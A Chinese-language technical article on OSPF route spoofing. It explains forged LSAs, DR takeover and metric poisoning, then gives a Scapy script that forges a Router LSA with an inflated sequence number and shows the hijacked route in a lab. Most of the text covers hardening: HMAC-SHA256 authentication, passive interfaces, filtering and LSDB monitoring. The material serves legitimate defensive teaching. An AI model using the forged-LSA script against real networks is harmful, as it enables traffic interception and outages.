ARTICLE DETAIL

资讯详情

深耕网站视觉设计与运营推广的一线实战洞察。

OSPF路由项欺骗攻防实战:从伪造LSA到全网加固

OSPF路由项欺骗攻防实战:从伪造LSA到全网加固 安全评估做到第六个任务时我决定把OSPF路由项欺骗单独拎出来做一轮攻防实验。原因很简单在真实网络里路由协议的安全往往是最容易被忽视、但破坏力又最大的一环。很多人觉得OSPF是动态路由协议链路断了会自动收敛攻击者根本影响不了什么——这个想法非常危险。OSPF最初的设计目标是高效、快速收敛而不是对抗恶意邻居。默认配置下OSPFv2报文甚至不携带认证信息攻击者只要接入一个不该接入的二层端口就可能伪造路由项把整张网络的路由表搅得天翻地覆。这篇文章把我从原理、攻击手法到防御落地的全过程整理出来给需要做内网安全评估、网络加固的工程师一个可直接复用的参考。1. 为什么安全评估清单里永远有OSPF这一项1.1 一个容易被忽视的事实OSPF建立在邻居可信的假设上OSPF是一种链路状态路由协议它和RIP、EIGRP这种距离矢量协议最本质的区别在于每台路由器不只是告诉邻居我这里有网段metric是多少而是把整张网络拓扑的碎片信息——也就是LSA——发给整个区域内的所有路由器。每台路由器把这些LSA收集起来放进自己的LSDB链路状态数据库然后用SPF算法计算出一棵以自己为根的最短路径树最后生成路由表。这个机制在正常运行环境下非常优雅收敛快、无环路、层次清晰。但问题恰恰出在信任模型上OSPF的设计者当初默认凡是能和我建立OSPF邻居关系的设备都应该是我信任的、隶属于同一张网络的设备。正因为这个默认假设OSPFv2在很长一段时间里默认不启用任何认证。也就是说任何能物理接入到你内网二层的设备只要发出一个格式正确、参数匹配的Hello报文就有机会被你的路由器当成邻居甚至当成DR指定路由器然后把它发来的LSA当作路由事实写进LSDB。我做加固专项的时候遇到过不少客户边界防火墙、入口ACL、终端准入都做得挺全但内部核心路由器的OSPF区域还是裸奔状态。我打过一个比方这就像小区大门修得跟堡垒一样结果单元门钥匙挂在门框上谁都能开门上楼。OSPF不认证攻击者一旦进到二层路由协议就是一条直通核心的走廊。1.2 路由项欺骗攻击到底伤害什么黑洞、绕行还是全盘接管路由项欺骗攻击简单说就是攻击者往OSPF域里注入一条虚假LSA让全网或部分路由器的路由表发生改变。伤害可能分几个层级路由黑洞攻击者伪造一条到目标网段的虚假路由下一跳指向一个不存在的地址或者特意让路由的metric非常大导致本来能走的路径被顶掉业务直接不可达。这种攻击最难排查因为链路本身是通的光看接口状态什么都发现不了但业务就是不通。流量绕行攻击者把目标网段的路由指向自己控制的一台设备让流量经过自己先抓取、再转发。这相当于在网络路径上插了一个中间人而且因为OSPF会自动收敛流量恢复可能很慢运维人员往往等到黑客已经把数据拿走很久了才发现。LSDB震荡与CPU耗尽攻击者不断产生大量伪造LSA或者反复刷新高版本号的LSA强制区域内所有路由器反复运行SPF重算。路由器CPU被路由计算占满转发性能下降甚至控制平面完全失去响应。这三种伤害里第一种最常见第二种最危险第三种最隐蔽。攻击者真正需要做的可能只是找一个接入点然后发几个精心构造的报文而已。2. 动手之前先把OSPF几个关键机制过一遍2.1 LSDB与LSA类型攻击者要伪造的路由事实长什么样要理解伪造LSA的原理必须先知道LSDB里存的是哪几类事实。OSPF中LSA类型很多但和路由项欺骗直接相关的主要是下面几类LSA类型名称通告者作用与路由项欺骗的关系Type 1Router LSA每台运行OSPF的路由器描述自己的直连接口、链路口、邻接关系是SPF计算的基本输入攻击者伪造自己或他人的Router LSA可以宣告虚假直连网段Type 2Network LSADR描述广播网段内所有与DR建立了完整邻接关系的路由器配合Router LSA伪造广播网段拓扑Type 3Summary LSAABR描述从一个区域到另一个区域的路由攻击者可伪造区域间路由影响其他区域的路由选择Type 5AS External LSAASBR描述重分发进OSPF的外部路由比如静态路由、直连路由、BGP路由攻击者可伪造外部路由利用E1/E2的选路规则抢占路由表Type 4ASBR Summary LSAABR描述ASBR的位置信息一般不直接伪造但会配合Type 5使用路由器收到这些LSA后会先检查合法性通过后就存入LSDB。LSDB里每一项都不是普通的网段metric而是一个描述网络拓扑的片段。正因为OSPF的SPF计算是基于全网LSDB的伪造一个LSA不只会影响一台路由器而是可能影响整个区域这正是OSPF路由欺骗比静态路由欺骗破坏范围更大的原因。2.2 邻居建立的匹配条件为什么伪造一个邻居比想象中难一点攻击者想注入LSA第一步通常是想办法成为网络里的一台合法OSPF路由器。OSPF建立邻居关系时Hello报文里要匹配一堆参数不匹配就不会进入下一步。常见的匹配项包括Area ID必须一致认证方式必须一致Hello间隔和Dead间隔必须一致如果是广播/非广播多路访问网络接口掩码需要匹配Router ID不能与现有路由器冲突这些条件看起来挺严格但问题是在未启用认证的OSPF域里攻击者只要接入二层后用抓包工具比如Wireshark观察一下网络里的Hello报文就能把所有参数看得清清楚楚。Area ID是多少、Hello间隔几秒、Dead间隔几秒、有没有配DR优先级全都能在报文字段里读出来。然后攻击者用相同的参数回一个Hello设备自然就把它当成潜在邻居了。所谓比想象中难一点难的不是破解而是攻击者必须老老实实符合参数约束——但这也是可以被自动化脚本快速完成的。再到广播网段还有一个DR/BDR选举机制。很多人会问每个区域都有DR吗严格说不是。DR/BDR是每个广播型多路访问网段各自选举的一个OSPF区域里有多个交换网段就可能有多组DR/BDR点到点链路上根本没有DR。攻击者如果想在广播网段快速地影响路由会想办法把自己的Router Priority改成255争取成为DR或BDR。一旦成为DR它就天然获得往整个网段泛洪LSA的资格整个LSDB都能被它污染。2.3 泛洪与LSA版本号伪造LSA必须看起来更新OSPF的LSA泛洪机制里有一个关键约束一台路由器收到一条LSA后如果LSDB里已经有同类型、同链路状态ID、同通告路由器advertising router的LSA条目那么它不会轻易替换旧条目而是会比较序列号sequence number、校验和、老化时间。只有序列号更大或者序列号相同但校验和不同、老化时间更新的LSA才会被当作新事实接受并继续泛洪。这意味着攻击者伪造一条LSA时不能只关心网段和metric还得设置一个足够高的序列号确保它能覆盖原有的合法LSA。OSPF序列号从0x80000001开始递增到0x7FFFFFFF。攻击者通常会设一个比较大的值比如0x8000000A这样即使网络里已经存在同源的LSA它也能用更高的序列号把旧版本压下去。如果攻击者持续发送更高序列号的伪造LSA甚至能造成LSDB里的合法记录被反复覆盖整个区域持续震荡。这也是防御方做监控时应该关注的一个要点一条LSA如果突然出现了与原有通告路由器相同、但序列号异常跳变的情况大概率是有人在伪造。3. 攻击手法逐个拆解从伪造LSA到路由毒化3.1 伪造Router LSA注入虚假直连路由最基础的一种路由项欺骗是伪造Type 1 Router LSA把它作为攻击者这台路由器自己有一条直连网段的事实注入OSPF域。举个例子如果攻击者想让全网路由器都认为去往192.168.20.0/24的最优路径经过自己它可以构造这样一条Router LSA通告路由器Advertising Router攻击者自己的Router ID链路类型Stub网络链接链路IDLink ID192.168.20.0链路数据Link Data255.255.255.0Metric通常设成1然后把这条Router LSA封装进Link State Update报文发送到组播地址224.0.0.5。区域内的其他路由器收到后SPF计算时会把192.168.20.0/24这棵叶子节点挂在攻击者的名下。如果从其他路由器到攻击者的路径开销加上这个1比原来的合法路径更短路由表就会被改写。举例来说正常情况下R1去往192.168.20.0/24路径是R1→R2→R3出接口cost累加起来可能是10。攻击者就在R1的直连网段里R1到攻击者的出接口cost通常是1加上攻击者宣告的metric 1合计2。2小于10SPF算下来当然走攻击者。一条精心构造的LSA就能把整条业务路径引到攻击者手上。3.2 伪造Network LSA和Router LSA组合让下一跳落到攻击者手里伪造Router LSA只是让路径经过攻击者的路由但数据平面真正转发时还取决于下一跳IP能否在二层被解析。攻击者想要真正拿到流量就需要保证自己的接口IP出现在伪造拓扑的链路信息里同时让其他路由器能在二层解析到自己的MAC地址。更复杂的攻击会组合伪造Router LSA和Network LSA。攻击者在广播网段先竞选成DR然后伪造一个Network LSA宣告该网段上连接着攻击者的Router ID和IP同时再伪造Router LSA宣告攻击者有到达目标网段的stub链路。这样一来OSPF拓扑里攻击者就成了一个合法中转节点其他路由器会把到目标网段的流量送到攻击者的接口IP上攻击者再通过ARP、ND等二层协议让流量真正到达自己的网卡完成接收、抓取、再转发。这种组合攻击最危险因为它不只是破坏可用性而是把机密性也击穿了。所有经过的明文业务流量都可能被攻击者看得一清二楚。这也提醒我们OSPF空间里的任何未经认证的新成员都应该被视为头号风险。3.3 基于metric的路由毒化把一条好链路变成断头路还有一种攻击方式不伪造新网段而是修改已有路由的metric。OSPF计算路径时同一网段可能出现多条等价或者非等价路由最终选路由metric决定。攻击者如果伪造一条到目标网段的LSA把metric设成极大值甚至设为大于接口最大有效值的毒化值就能让其他路由器认为经某台设备的路径开销奇高路径选择发生偏移。这类攻击的隐蔽性很强。因为从监控面板看链路接口没有down邻居关系正常只是某条路由的路径开销变大了。运维人员会怀疑是不是光模块劣化、链路误码率变高导致OSPF自动改路而不会第一时间想到是有人注入了一条高metric的LSA。尤其是那些路由项比较多的核心网络一条高metric LSA混在里面排查起来非常痛苦。3.4 从路由欺骗到流量劫持的完整链条在我自己搭的实验环境里把攻击链路完整串起来大概是这样的攻击者物理接入或通过被攻陷的终端接入核心交换网段。抓取OSPF Hello报文读取区域、计时器、Router ID等参数。配置一个与网段同段的IP并发送匹配参数的Hello和现有路由器建立OSPF邻接关系。通过提升Router Priority竞选DR取得LSA泛洪的主动权。伪造Router LSA/Network LSA宣告到目标网段的低metric路径让全网路由表切换到攻击者路径。配合ARP欺骗或路由下一跳指向让流量实际到达攻击机完成中间人监听或黑洞。每一步都有对应的防御点。你别看整个链条长真正会写脚本的人几十行代码就能自动化跑完前几步。这也是为什么OSPF加固不能拖到出事再说而是要在网络建设之初就纳入基线。4. 实验环境复现一把scapy脚本看透欺骗全过程4.1 实验拓扑与基础OSPF配置以下全部操作都建议在网络攻防实验平台比如GNS3、EVE-NG或独立的授权实验网里完成不要在生产网络上做任何验证性攻击测试。我的实验拓扑如下R1位于10.0.12.0/24网段下连192.168.10.0/24Router ID为1.1.1.1R2连接R1和R3Router ID为2.2.2.2R3位于10.0.23.0/24网段下连192.168.20.0/24Router ID为3.3.3.3攻击者Attacker接入R1和R2之间的交换机IP为10.0.12.100R1的OSPF基础配置可以用下面这段以Cisco IOS为例R1(config)# router ospf 1 R1(config-router)# router-id 1.1.1.1 R1(config-router)# network 10.0.12.0 0.0.0.255 area 0 R1(config-router)# network 192.168.10.0 0.0.0.255 area 0R2、R3也做类似配置整个区域保持最简单状态不配置认证、不配置被动接口、不配置过滤。这正是很多真实内网里OSPF区域的默认状态——完全裸奔。4.2 攻击前正常路由表与LSDB快照攻击开始前我在R1上做一次快照记录正常状态。可以看到R1去往192.168.20.0/24的路由下一跳是R2R1# show ip route 192.168.20.0 Routing entry for 192.168.20.0/24 Known via ospf 1, distance 110, metric 10 Last update from 10.0.12.2 on GigabitEthernet0/0 * 10.0.12.2, from 3.3.3.3, via GigabitEthernet0/0同时检查OSPF邻居和LSDB摘要R1# show ip ospf neighbor Neighbor ID Pri State Dead Time Address Interface 2.2.2.2 1 FULL/DR 00:00:36 10.0.12.2 GigabitEthernet0/0 R1# show ip ospf database router 3.3.3.3此时LSDB里只有三台真实路由器自己的Router LSA。攻击者出现之前一切都很正常。4.3 构造并发送伪造LSA攻击者的核心思路是构造一条Router LSA声明我Router ID 10.0.12.100有一条直连的stub链路192.168.20.0/24metric为1。在实验环境里我用Scapy构造OSPF报文发送给R1的接口。下面是脚本的核心片段from scapy.all import * from scapy.contrib.ospf import OSPF_Hdr, OSPF_LSUpd, OSPF_LSA_Hdr, OSPF_Router_LSA, OSPF_Link attacker_rid 10.0.12.100 target_net 192.168.20.0 target_mask 255.255.255.0 # 构造Router LSA lsa OSPF_Router_LSA( headerOSPF_LSA_Hdr( type1, # Router LSA idattacker_rid, # Link State ID adrouterattacker_rid, # Advertising Router seq0x8000000A, # 序列号确保比已有同源LSA更新 chksum0 # Scapy发送时会自动计算 ), flags0, options0x02, links[ OSPF_Link( linkidtarget_net, # 目标网段 linkdatatarget_mask, # 掩码 type3, # Stub网络 metric1 # 低metric让SPF优先选择 ) ] ) # 封装为Link State Update发给OSPF组播地址 pkt IP(src10.0.12.100, dst224.0.0.5) \ / OSPF_Hdr(srcattacker_rid, area0, type4) \ / OSPF_LSUpd(lsacount1) \ / lsa send(pkt, ifaceeth0, verboseTrue)需要提醒一点Scapy不同版本的OSPF报文构造API存在差异如果你用的版本字段名对不上先用ls(OSPF_Router_LSA)查看一下字段结构再按实际字段名调整。核心不是脚本本身而是你理解了要伪造的是哪台路由器、哪个网段、多少开销。如果是真实实验攻击机还需要配置一个10.0.12.100的接口地址确保源IP能正常发出二层也能被交换机转发。若攻击机与R1之间没有活动链路还需要通过ARP相关操作让R1能把10.0.12.100解析出来。这在GNS3/EVE-NG里操作起来非常方便建议先在一台独立的Linux设备上做好预演。4.4 攻击后路由表变化与连通性验证发送伪造LSA之后我立刻回R1上查看路由表效果非常直观R1# show ip route 192.168.20.0 Routing entry for 192.168.20.0/24 Known via ospf 1, distance 110, metric 2 Last update from 10.0.12.100 on GigabitEthernet0/0 * 10.0.12.100, from 10.0.12.100, via GigabitEthernet0/0原来经过R2的路径metric是10现在变成了经过攻击者10.0.12.100、metric为2的路径。R1毫不犹豫地选择了新路径。如果攻击者再配合ARP让10.0.12.100对应的MAC变成自己的网卡那所有发往192.168.20.0/24的流量都会先经过攻击者。在Wireshark里还能看到一条新的Router LSA记录。攻击前后的区别很明显攻击前LSDB里Router LSA的来源只有三个真实Router ID攻击后多了一个10.0.12.100并且它名下挂着一条192.168.20.0/24的stub链路。这个多出来的邻居节点多出来的网段就是最直接的攻击痕迹。5. 防御策略完整落地三个层次的防护5.1 第一层OSPF认证把谁有资格说话锁死最根本的防御就是启用OSPF认证。认证的本质很简单每个OSPF报文里带上一个用预共享密钥计算出来的摘要接收方先验证摘要合法再决定是否接受这个报文。这样一来攻击者即使抓到了全部Hello参数也因为没有密钥而无法构造出合法报文更不要说伪造LSA了。OSPFv2的认证方式在配置上分几种明文认证simple、MD5认证message-digest、以及较新版本设备支持的HMAC-SHA256。明文认证抓包就能看到密钥基本属于摆设MD5在过去很长一段时间里是主流但当前安全基线建议直接上HMAC-SHA256能避免弱哈希带来的离线破解风险。Cisco IOS的配置方式是在区域下启用认证同时在每个参与OSPF的接口上配置密钥R1(config)# router ospf 1 R1(config-router)# area 0 authentication message-digest R1(config-router)# exit R1(config)# interface GigabitEthernet0/0 R1(config-if)# ip ospf message-digest-key 1 md5 MySecretKey2024如果设备支持HMAC-SHA256推荐改为R1(config)# router ospf 1 R1(config-router)# area 0 authentication hmac-sha256 R1(config-router)# exit R1(config)# interface GigabitEthernet0/0 R1(config-if)# ip ospf authentication hmac-sha256 key-id 1 key MySecretKey2024华为VRP平台的配置思路相同命令略有差异。华为一般是在OSPF区域下配置认证模式再到接口下配置具体密钥[R1] ospf 1 [R1-ospf-1] area 0 [R1-ospf-1-area-0.0.0.0] authentication-mode hmac-sha256 key-id 1 cipher MySecretKey2024 [R1-ospf-1-area-0.0.0.0] quit [R1-ospf-1] quit [R1] interface GigabitEthernet0/0/0 [R1-GigabitEthernet0/0/0] ospf authentication-mode hmac-sha256 key-id 1 cipher MySecretKey2024启用认证时一定要注意区域里所有路由器都要完成相同的认证配置密钥也要一致否则邻居关系直接起不来。更稳妥的做法是先在一台设备上把密钥预配置好再逐台在低峰窗口滚动切换避免全网同时操作导致大面积中断。5.2 第二层接口与区域边界过滤减少攻击注入面认证是必须的但光有认证还不够。一个健壮的OSPF部署应该尽量缩小协议报文的暴露面。最常用的手段是配置被动接口passive-interface——把不需要建立OSPF邻居的接口全部设为被动接口上不再发送Hello报文自然也不会接受新邻居。比如连接终端、服务器、打印机的接口完全没必要跑OSPF。Cisco全局配置示例R1(config-router)# passive-interface default R1(config-router)# no passive-interface GigabitEthernet0/0华为对应的是silent-interface配置在OSPF视图下把不需要发Hello的接口加进silent列表。这样即使终端侧被攻击者控制也无法从该网段加入OSPF域。另一个层是区域边界和重分发边界的过滤。很多网络会跨区域部署或者在边界把静态路由、直连路由重分发进OSPF。可以在ABR上用区域间路由过滤只允许合法前缀进入其他区域R2(config)# ip prefix-list ALLOWED-ROUTES seq 5 permit 192.168.0.0/16 R2(config)# router ospf 1 R2(config-router)# area 0 filter-list prefix ALLOWED-ROUTES out华为在区域视图下也有类似的filter export配置。但必须说清楚这类过滤能挡住违规的重分发却挡不住攻击者直接伪造LSA泛洪进区域。因为攻击者伪造的LSA是从合法的OSPF会话里送进来的ABR上配置的prefix-list不一定对内部产生的Type 1/Type 2 LSA生效。所以过滤是纵深防御不是替代授权验证的方案。5.3 第三层基础设施加固与异常监控第三层防护的重点是让攻击者进不来、待不住、藏不了。进不来要靠二层接入安全。攻击者能发起OSPF欺骗前提是能接入到路由网段。802.1X端口认证、DHCP Snooping、动态ARP检测、端口安全这些手段虽然不能直接识别OSPF报文但能有效阻止陌生设备随意接入网络。真正严谨的区域建议交换机端口只允许特定MAC或通过认证后才能转发数据。待不住靠设备自身保护。部分较新设备支持OSPF TTL安全检查比如ip ospf ttl-security hops 1只接受TTL255的OSPF报文用来防止攻击者绕过多跳注入。另外在核心路由器上配置Control Plane PolicingCoPP对发往CPU的OSPF协议报文做限速能防止LSA风暴直接打瘫控制平面。藏不了靠监控与告警。运行OSPF的网络应该有对LSDB变化的感知能力。常见做法包括周期性比对show ip ospf database里出现的Router ID列表发现未知Router ID立即告警用SNMP轮询OSPF-MIB中的ospfLsdbTable和ospfNbrTable对新增LSA、邻居状态变化做事件告警核心链路上启用NetFlow/sFlow发现流量路径发生非计划切换比如原本走R2的流量突然改走攻击者IP时触发排查用集中日志系统收集路由协议日志保留足够的追踪线索我见过不少事故问题根本不是没能力发现而是没有监控意识。路由协议层面的异常往往不表现为接口down而是表现为路由路径悄悄变了。如果没有基线比对谁都不会注意到一个陌生Router ID已经混进了核心区域。6. 加固过程中的实测排错与经验总结6.1 邻居卡在ExStart九成是MTU问题配置OSPF认证时最常见的翻车现场就是邻居起不来。排错第一步先用show ip ospf neighbor看状态。如果邻居一直卡在ExStart/Exchange不要急着怀疑认证密钥先检查两端接口的MTU是否一致。OSPF在DBD报文交换阶段会携带接口MTU两端不一致会导致协商失败。Cisco设备默认MTU是1500但如果链路中间有MPLS、QinQ、隧道封装或者运维人员调整过MTU就容易出现这个问题。临时验证手段是在接口下加ip ospf mtu-ignore但生产环境不建议长期依赖这个最好把整条链路MTU规划清楚两端保持一致。华为设备也会在报文中携带MTU同样需要两端匹配。如果邻居状态反复在Init和ExStart之间跳变同时日志里有authentication error关键字那基本就是认证密钥不一致需要逐一核对区域认证模式和接口密钥ID。6.2 配置认证后最容易出现的自残行为有一次我在给客户的汇聚交换机做OSPF认证时在没有通知所有人的情况下直接下了area 0 authentication message-digest命令结果核心路由器在几分钟后全部丢邻居业务中断了将近十分钟。事后复盘就是典型的自残区域级认证命令已经下发但接口密钥还没来得及配置OSPF报文直接因为没有有效认证而丢包有的接口配了key有的接口漏配同一个区域内邻居关系东一个西一个地消失还有一次是华为设备上把区域认证配成了authentication-mode md5接口下却只配了明文认证两边认证模式不一致日志疯狂报错所以我现在做这个操作基本会按这个顺序走先把所有参与OSPF的接口密钥或者认证参数预配置好但先不启用区域认证选一条低峰时段在区域下启用认证模式立刻观察邻居收敛情况确认稳定后再清理掉临时配置配置完成后保存配置并把密钥放入配置管理系统的加密存储里6.3 一套我觉得比较稳的交付清单如果你正打算给现有OSPF网络做加固下面这份清单是我在多次项目里验证过比较实用的步骤操作验证方法梳理OSPF端口找出所有运行OSPF的接口确认哪些必须建邻居哪些该设被动show ip ospf interface brief启用强认证区域认证模式改为HMAC-SHA256并逐接口配置密钥show ip ospf查看认证类型确认邻居全部正常所有邻居状态应为Full或至少2-Wayshow ip ospf neighbor收紧接口暴露面接口大量使用passive-interface default从终端侧抓包确认没有Hello报文发出边界路由过滤ABR/ASBR上配置前缀过滤避免非法重分发检查其他区域路由表缺失情况接入层安全交换机端口启用802.1X/端口安全陌生设备无法接入监控与告警对LSDB新增Router ID、路由表变化做告警模拟新增LSA验证告警是否触发定期演练至少半年做一次路由欺骗攻击与防御复盘验证防御策略没有被新设备绕过我在实际项目里的体会是OSPF加固最麻烦的从来不是技术本身而是改配置的时机和团队之间的配合。防御策略再好如果只在某一台设备上做或者在下发命令前没有和上下游团队对齐最后都会变成一次让人头疼的割接事故。最后再分享一个小技巧如果你手头有实验环境强烈建议先做一次完整的攻击—抓包—加固—再攻击闭环。你会发现配置认证前后Wireshark里同一个伪造LSA的行为变化非常明显。加固前R1会老老实实地接受并运行SPF加固后同样的报文直接被丢弃邻居关系纹丝不动。只有亲眼看过这个差异你才能真正理解为什么OSPF认证一定是内网安全基线里绕不开的一环。
返回列表